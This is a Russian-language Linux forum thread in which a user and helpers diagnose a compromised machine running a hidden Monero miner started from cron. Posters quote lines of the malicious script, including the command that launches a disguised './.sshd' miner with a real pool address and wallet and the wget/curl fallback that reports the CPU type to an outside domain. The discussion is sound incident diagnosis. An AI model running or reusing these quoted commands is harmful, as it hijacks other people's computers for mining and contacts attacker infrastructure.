Взломали систему

Да, оно самое. Причем по данным whois домены из скриптика зарегистрированы 9 января 2018 года, так что у меня он тоже недавно.
RusWolf
А у меня wget даже не установлен.
А у меня крона даже нет.

genues
Намного важнее определить источник заражения и принять меры.
+++
RusWolf
А у меня wget даже не установлен.
нет wget, будет использоваться curl...
pavelchavyr
Вот как раз источник заражения меня и беспокоит, так как не могу его выявить
поискать internetresearch во всех файлах в домашней папке не пробовал?
Псевдографический инсталлятор Arch Linux ver. 3.8.2
Благодарности принимаются на ЯД 410012815723874
nafanja
поискать internetresearch
Заодно и исполняемые файлы проверить
find . -type f -perm /u+x -print
можно вообще домашнюю с noexec, nosuid монтировать
Файлы поискал, ничего не нашел.
Лог крона говорит, что заражение произошло 8 января.
pavelchavyr
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
По идее 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' - это имя процесса
проверь запущен ли процесс
$ pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8'
......... пусто .........
$ pgrep -f 'firefox'
494

pavelchavyr
pid=$(pgrep -f -o 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8')
test $pid && pgrep -f 'tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8' | grep -vw $pid | xargs -r kill -9
pgrep -f tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 && exit 0
Если запустить такой скрипт, но вместо tQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8 вписать firefox, то на выходе будет тот же pid = 494
И это один в один совпадает со ссылкой, указанной corner - имхо, ищется pid этого процесса, а вот что это за внедренный процесс и что он делает - непонятно.
Ошибки не исчезают с опытом - они просто умнеют
Это майнер. Скрипт проверяет, запущен он или нет.
pavelchavyr
Это майнер. Скрипт проверяет, запущен он или нет.
Понятно - так оно и выходит.
Но вот что это за код, так и не понятно. Но внедриться он мог скорее всего из-за слабого пароля.
У меня пароли не менее 20 знаков с тремя уровнями - но заточены так, что вспомнить могу всегда, даже среди ночи.
Ошибки не исчезают с опытом - они просто умнеют
Это часть имени пользователя монеро. Дальше в коде можно увидеть его полный логин, в последних двух строчках.
pgrep -f hashvault||./.sshd -o pool.monero.hashvault.pro:5555 -u 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h -p x -k -B||wget http://lochjol.com/FAIL -O /dev/null --user-agent "$(uname -p)"||curl http://lochjol.com/FAIL --user-agent "$(uname -p)"
Я тоже склоняюсь к версии со слабым паролем. Вот только почему в логах нет записи о входе с левого айпишника?
 
Зарегистрироваться или войдите чтобы оставить сообщение.